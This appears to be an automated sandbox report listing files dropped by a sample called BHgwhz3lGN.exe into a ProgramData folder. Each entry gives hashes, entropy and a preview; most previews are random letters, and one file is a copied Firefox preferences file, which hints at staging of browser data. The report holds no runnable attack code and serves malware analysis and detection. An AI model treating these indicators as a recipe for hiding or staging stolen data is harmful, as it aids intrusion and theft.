                                                                                                                                                                                                                                                                                          Preview:UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN

                                                                                                                                                                                                                                                                                          C:\ProgramData\6xb1d\c2vkng

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.692693183518806
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
                                                                                                                                                                                                                                                                                          MD5:78F042E25B7FAF970F75DFAA81955268
                                                                                                                                                                                                                                                                                          SHA1:F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
                                                                                                                                                                                                                                                                                          SHA-256:E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
                                                                                                                                                                                                                                                                                          SHA-512:CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:HTAGVDFUIELGZFCTZZGRSQISCXMOKSCAZEJVAPBPJKABIZKEGFAGMGOIUPHPJOYIWMVIKWCNUOWDMGCFXJQANMMOULIVTQQGUZVVOLZWBYTHYOHMMVIMTTBBCAIGONNRVEUMTCTCEMTWFNDSQPHEPLAFZAKYSROZKRQDUZOUZIKJGJRIBJODHOULJHWQBIJSAIYMXLFOSFOEFKTQPEEWFTFCIFSLHXSXYXBWTPCWMCGPETOSVLNKYCONFWCIUFEQKOWQNQKJSIZKNZXOQWMTJOGWDBUFBKDXUPYYIXUTOPSOVWLVKIOKFPSXDAVMBUZIYYZUQTDLZIMRRGXLTOEJMFWLOMNPNLICPZPKTHPXELGBYTJLOJOEWNRDNMXXRYMAJBWCTNMBREIJDVVIXEHEGYQKZQCGLVHOCMUSKXCQQMURLYKWUIUMFSGYMZUQXCTZOKQYXJAUDEVTSOOQUKZKKEEOANGSIIWTUVEGHTCOTXCDTCZIFUAWDLWKDNQTUAXBCRBKEGHCEPWTXOQVBWKIXLQEUCHHRHMKWOVVBFOLNUHSLLMHOOFDQCOVQVCNKKYOGNPYFHMPHXNPOTANYIGKSXGYDKBAEAYCNSDEQRTDZXKUOIUOHOMJPCCDXHJTXLKPCLAKLUNDAFZVUXKBSBAWUIBEQFANHTKLDXHBVLMBIXZUPHFUIHTECGPPEITWIRPTQHJDDRMAQERQMDOELBOQSEMMMCCUPQVDZXOFFYQSEIDXDPFNKRGYVUDDHHQGPRFUFAJOKTJSGMHWRXPZFPTHUACEOFEZUYOSJGJLFUTHTDWBPUETPFOWWTNVGDPCHGGCYSORPYRNRZVFDIQZLGVXSZLKMPDVKQURMLSZDDXVNBPXKBLQIKBTAWLYTZWTFUNWLSZPWUWBVBXUJMBCFHPMBIRGLQAWDQTJEHKOGMUTEILXROVHXNUORTTYMCMDGNZYCCCTIABCKYPUCGPPUUSBWLIPYZKIMRHFVZCGDPKZ

                                                                                                                                                                                                                                                                                          C:\ProgramData\6xb1d\ct0h4e

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.699434772658264
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
                                                                                                                                                                                                                                                                                          MD5:02D3A9BE2018CD12945C5969F383EF4A
                                                                                                                                                                                                                                                                                          SHA1:085F3165672114B2B8E9F73C629ADABBF99F178D
                                                                                                                                                                                                                                                                                          SHA-256:6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
                                                                                                                                                                                                                                                                                          SHA-512:A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD

                                                                                                                                                                                                                                                                                          C:\ProgramData\6xb1d\d2n790

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.688284131239007
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:94BsLCi4I4Bpno3+PqX1T1MziEko3RYNdEK:alI4BjP4x9JGK
                                                                                                                                                                                                                                                                                          MD5:E8ACCA0F46CBA97FE289855535184C72
                                                                                                                                                                                                                                                                                          SHA1:059878D0B535AEE9092BF82886FC68DC816D9F08
                                                                                                                                                                                                                                                                                          SHA-256:CFB1D698291CFF6EFE21CB913EDEB823FA6F84B5F437F61ED9E04C6A80CC4DCD
                                                                                                                                                                                                                                                                                          SHA-512:185601B848EDE2A752D1DC0534A2593231C67AF68E506DD3BA05D93435780F378250B27898CBD61F225C5FE6AB72CD21638C6159FC2D107767D2AB43547E0E71
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:WUTJSCBCFXNSEWGLWGYOOQVVDPFNFUMPQAJVNXNKMXQRORVUIYYNQWAMOZTIZPEADOKEPDLVMNENFIICEKOTBVPODCEHVNDEMTCADGQBTUSRFDCQOFZZQCSIEKBJNREDYYVFOXFLSAVVRDBODQPUEQUZAVGFLXOWSKRTDQOYTNPZUFOPXFJPIZPUZNQGPAVLZQOLZQMEBSIDSSSOCJNYRGTGEHRLTXLSBXCVGBOIDKKEIUHPVJXFIBUKHHHIZJXBNSFVSIBUVDLJVQHLZQNPKVUYGSBYLDPVSZZIAGXVZKTZMOMHKJTCACLNIHVZQOYHZUOCHMTDPXWSWWCTZKVXUPJXTUQVYKVNBTOOXYSOQYGOROUJYIQIBLZXWHWHSDDSIDRAQBFHFUASJJFJZGJMXLKHMELZDCBSAECBJUYDLONQSYTFIGRFXVYQXQGOAYYQXFJQFPARQPKZARUFLFZALPMOXFKFAAFQYQJSBYRLXSYWILKBWNNKNPTXDFHFCBTUEWYUGEMBZMEFHNMBDRELQEYFKIFARDWZODMHWXQBTISSHAEWZTVFJRKELIBQQEXSWFZUGGGKZXSPWOXYPOCCJIHNGOPVFNWYZRPTOWAGQPVVZLHPYYBDQTUFWFIVGYOBQSXERHTUDUHOJIRJFKQQOOIXOHPHYQPYDGSQQNOEUWFVOVYMHEJBARDLGPVSTERBBBFSGVNSUAZCVAXBSTLPAQENSALLVBNGJHCERSSMMHCALJSZJJKDFYFVTEQEUIBYNZPMUJQZNJVUGNGKENCJKNBTKBYOEUUGFFKIBVHNAUHYEUNDBZPKFZERTSXYHOMVAJJBPSNOOYHZFWINWEJCFGHKIORUHARZYNBKYMOWZHDVWQBITESVLGVECBBJDDHUCWOJFWBQJSKRWHJPPGEKBDXIPJJDDYHGUCDCBZQDUVHEBPPQBUDSOAYQTNFMYUBRJNRJFSMUCNFWURFGGIHZFMXDVIINVRGXSRYXBYBI

                                                                                                                                                                                                                                                                                          C:\ProgramData\6xb1d\dj5xtr

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.688284131239007
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:94BsLCi4I4Bpno3+PqX1T1MziEko3RYNdEK:alI4BjP4x9JGK
                                                                                                                                                                                                                                                                                          MD5:E8ACCA0F46CBA97FE289855535184C72
                                                                                                                                                                                                                                                                                          SHA1:059878D0B535AEE9092BF82886FC68DC816D9F08
                                                                                                                                                                                                                                                                                          SHA-256:CFB1D698291CFF6EFE21CB913EDEB823FA6F84B5F437F61ED9E04C6A80CC4DCD
                                                                                                                                                                                                                                                                                          SHA-512:185601B848EDE2A752D1DC0534A2593231C67AF68E506DD3BA05D93435780F378250B27898CBD61F225C5FE6AB72CD21638C6159FC2D107767D2AB43547E0E71
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:WUTJSCBCFXNSEWGLWGYOOQVVDPFNFUMPQAJVNXNKMXQRORVUIYYNQWAMOZTIZPEADOKEPDLVMNENFIICEKOTBVPODCEHVNDEMTCADGQBTUSRFDCQOFZZQCSIEKBJNREDYYVFOXFLSAVVRDBODQPUEQUZAVGFLXOWSKRTDQOYTNPZUFOPXFJPIZPUZNQGPAVLZQOLZQMEBSIDSSSOCJNYRGTGEHRLTXLSBXCVGBOIDKKEIUHPVJXFIBUKHHHIZJXBNSFVSIBUVDLJVQHLZQNPKVUYGSBYLDPVSZZIAGXVZKTZMOMHKJTCACLNIHVZQOYHZUOCHMTDPXWSWWCTZKVXUPJXTUQVYKVNBTOOXYSOQYGOROUJYIQIBLZXWHWHSDDSIDRAQBFHFUASJJFJZGJMXLKHMELZDCBSAECBJUYDLONQSYTFIGRFXVYQXQGOAYYQXFJQFPARQPKZARUFLFZALPMOXFKFAAFQYQJSBYRLXSYWILKBWNNKNPTXDFHFCBTUEWYUGEMBZMEFHNMBDRELQEYFKIFARDWZODMHWXQBTISSHAEWZTVFJRKELIBQQEXSWFZUGGGKZXSPWOXYPOCCJIHNGOPVFNWYZRPTOWAGQPVVZLHPYYBDQTUFWFIVGYOBQSXERHTUDUHOJIRJFKQQOOIXOHPHYQPYDGSQQNOEUWFVOVYMHEJBARDLGPVSTERBBBFSGVNSUAZCVAXBSTLPAQENSALLVBNGJHCERSSMMHCALJSZJJKDFYFVTEQEUIBYNZPMUJQZNJVUGNGKENCJKNBTKBYOEUUGFFKIBVHNAUHYEUNDBZPKFZERTSXYHOMVAJJBPSNOOYHZFWINWEJCFGHKIORUHARZYNBKYMOWZHDVWQBITESVLGVECBBJDDHUCWOJFWBQJSKRWHJPPGEKBDXIPJJDDYHGUCDCBZQDUVHEBPPQBUDSOAYQTNFMYUBRJNRJFSMUCNFWURFGGIHZFMXDVIINVRGXSRYXBYBI

                                                                                                                                                                                                                                                                                          C:\ProgramData\6xb1d\ec2n7q

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.699434772658264
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
                                                                                                                                                                                                                                                                                          MD5:02D3A9BE2018CD12945C5969F383EF4A
                                                                                                                                                                                                                                                                                          SHA1:085F3165672114B2B8E9F73C629ADABBF99F178D
                                                                                                                                                                                                                                                                                          SHA-256:6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
                                                                                                                                                                                                                                                                                          SHA-512:A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD

                                                                                                                                                                                                                                                                                          C:\ProgramData\6xb1d\ecbiw4

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):98304
                                                                                                                                                                                                                                                                                          Entropy (8bit):0.08235737944063153
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                                                                                                                                          MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                                                                                                                                          SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                                                                                                                                          SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                                                                                                                                          SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                          C:\ProgramData\6xb1d\ectjmg

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1765), with CRLF line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):9526
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.515924904533179
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:efniR4oYbBp6Sp0pUhUxaXd6Y4nysZM2WklbBNBw8DUSl:hejGpCUvY4ysn7tpwx0
                                                                                                                                                                                                                                                                                          MD5:4580799F1DC5720A7EC1766400E98740
                                                                                                                                                                                                                                                                                          SHA1:92FD30F47EC545245B934EA492B3C64D5E609AA9
                                                                                                                                                                                                                                                                                          SHA-256:57F457D69933E9E8A98C32A05EEE96171419977D45AFFA674A9761556656B9FA
                                                                                                                                                                                                                                                                                          SHA-512:C0787F6584D1D26EBFD5AE59F32046CF1FF5AD1BEB1443F2FE93EB89EFA2F216CBC98E101BA3E38A2837ED9411A9DE1370E29ED96E83D8096547E53FEE964567
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "d3d72102-142d-47cc-a7b7-5b20541f2540");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696496527);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696496528);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

                                                                                                                                                                                                                                                                                          C:\ProgramData\6xb1d\ekf37y

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.705615236042988
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:B65nSK3I37xD9qo21p9G7ILc3pkowOeuiyJRdt7fXzyxu3f7Lj8X2:B65SK3Xx1OXpkowOeMJR/fzeYX8X2
                                                                                                                                                                                                                                                                                          MD5:159C7BA9D193731A3AAE589183A63B3F
                                                                                                                                                                                                                                                                                          SHA1:81FDFC9C96C5B4F9C7730127B166B778092F114A
                                                                                                                                                                                                                                                                                          SHA-256:1FD7067403DCC66C9C013C2F21001B91C2C6456762B05BDC5EDA2C9E7039F41D
                                                                                                                                                                                                                                                                                          SHA-512:2BC7C0FCEB65E41380FE2E41AE8339D381C226D74C9B510512BD6D2BAFAEB7211FF489C270579804E9C36440F047B65AF1C315D6C20AC10E52147CE388ED858A
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:DTBZGIOOSOGIXCBMGZZTWMBQXGHIBDIDBNCACFDFVBOXTDUUJMUMBAKZSHFEIWNQHEECYVTVTSOTORNQIPIDARMCQDPQAFMDPEUWMOYTBCDCAYVFJLXBCNSKBDWMSQYEQYRUTREAZDRNQIZYXPRJXUJXDYZYLJWOVPCEZSCSUSREYDMTRVOKIKSVPBPVQFMFFQNUDCCBDNGIIDGYMQHFPEMCFEOSEKVDEHVQZBXIBJURBZFVTYETURFSVIYLBMHJKBCAPGOAJJFKOTEXRMHREBNTBJGLLRAKZHXKTTSKEXODMEVVGUJOGNLYLFYGHQIBHAFRVYETMDPLEXBQXLVWYLIMFCJAKPFWSQSVSWYINAAOPMCAAVTIWDFRPKUBYLVKYRNUDCLWZJHLKSXWPDEXGEVUQVEJQWTUUYNTOIRLKQTXRWJHCSMGZWWPGPBFZQLOSDMHAPKSMVNNMIVJAORPRFUXPDROELZMLHAIBRVVWUMSDWFAHIBDVMGGFRISFYQZZSESXHMSUQCQPXBCPTAZBJXKKLRBWEZYGWRXBBTYWRRUXCBJIWCOYQKBQCGCZCPFVLGETTTZLEFZDQMQFHJVERUYLQUPVYRNXQJRLPUBWWQHPTYNORTRKKOMLWKAQZNHZQUJGTIYVIKGAWLHSALTZENHAAJKNKUBSQXDVFQRUFJLDFZAQUPCRNDOOEIALNCMGYLCEZSLPOPYEKIEYDRXSDONBFKQKQMAWBJULDADUHXOQGQLIDEPZRHMCBVTLCJUGOZRYCGXCXPEOJTGJORAEJKASXKARQEVOHMITSWHQEWOJXNOGSKWUQQTSOSWSCCMOUDMMHPYKEAJECJSGTBNPSFVWSGFBKGSKEHVLWONOMPOOJEJHDMKGRPCSBYWCZNHTWZCKQNEGEYABJZETYLVHROKZJAIGKJDHLJBRYOVDHNANLCJBHTDDRPXIXDIHNWDDQDHPSAKZRRXOFYYXZWQWZFESELWVMUIBHMCLVZP

                                                                                                                                                                                                                                                                                          C:\ProgramData\6xb1d\fknyct

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.705615236042988
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:B65nSK3I37xD9qo21p9G7ILc3pkowOeuiyJRdt7fXzyxu3f7Lj8X2:B65SK3Xx1OXpkowOeMJR/fzeYX8X2
                                                                                                                                                                                                                                                                                          MD5:159C7BA9D193731A3AAE589183A63B3F
                                                                                                                                                                                                                                                                                          SHA1:81FDFC9C96C5B4F9C7730127B166B778092F114A
                                                                                                                                                                                                                                                                                          SHA-256:1FD7067403DCC66C9C013C2F21001B91C2C6456762B05BDC5EDA2C9E7039F41D
                                                                                                                                                                                                                                                                                          SHA-512:2BC7C0FCEB65E41380FE2E41AE8339D381C226D74C9B510512BD6D2BAFAEB7211FF489C270579804E9C36440F047B65AF1C315D6C20AC10E52147CE388ED858A
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:DTBZGIOOSOGIXCBMGZZTWMBQXGHIBDIDBNCACFDFVBOXTDUUJMUMBAKZSHFEIWNQHEECYVTVTSOTORNQIPIDARMCQDPQAFMDPEUWMOYTBCDCAYVFJLXBCNSKBDWMSQYEQYRUTREAZDRNQIZYXPRJXUJXDYZYLJWOVPCEZSCSUSREYDMTRVOKIKSVPBPVQFMFFQNUDCCBDNGIIDGYMQHFPEMCFEOSEKVDEHVQZBXIBJURBZFVTYETURFSVIYLBMHJKBCAPGOAJJFKOTEXRMHREBNTBJGLLRAKZHXKTTSKEXODMEVVGUJOGNLYLFYGHQIBHAFRVYETMDPLEXBQXLVWYLIMFCJAKPFWSQSVSWYINAAOPMCAAVTIWDFRPKUBYLVKYRNUDCLWZJHLKSXWPDEXGEVUQVEJQWTUUYNTOIRLKQTXRWJHCSMGZWWPGPBFZQLOSDMHAPKSMVNNMIVJAORPRFUXPDROELZMLHAIBRVVWUMSDWFAHIBDVMGGFRISFYQZZSESXHMSUQCQPXBCPTAZBJXKKLRBWEZYGWRXBBTYWRRUXCBJIWCOYQKBQCGCZCPFVLGETTTZLEFZDQMQFHJVERUYLQUPVYRNXQJRLPUBWWQHPTYNORTRKKOMLWKAQZNHZQUJGTIYVIKGAWLHSALTZENHAAJKNKUBSQXDVFQRUFJLDFZAQUPCRNDOOEIALNCMGYLCEZSLPOPYEKIEYDRXSDONBFKQKQMAWBJULDADUHXOQGQLIDEPZRHMCBVTLCJUGOZRYCGXCXPEOJTGJORAEJKASXKARQEVOHMITSWHQEWOJXNOGSKWUQQTSOSWSCCMOUDMMHPYKEAJECJSGTBNPSFVWSGFBKGSKEHVLWONOMPOOJEJHDMKGRPCSBYWCZNHTWZCKQNEGEYABJZETYLVHROKZJAIGKJDHLJBRYOVDHNANLCJBHTDDRPXIXDIHNWDDQDHPSAKZRRXOFYYXZWQWZFESELWVMUIBHMCLVZP

                                                                                                                                                                                                                                                                                          C:\ProgramData\6xb1d\g4ekxt

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.692693183518806
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
                                                                                                                                                                                                                                                                                          MD5:78F042E25B7FAF970F75DFAA81955268
                                                                                                                                                                                                                                                                                          SHA1:F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
                                                                                                                                                                                                                                                                                          SHA-256:E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
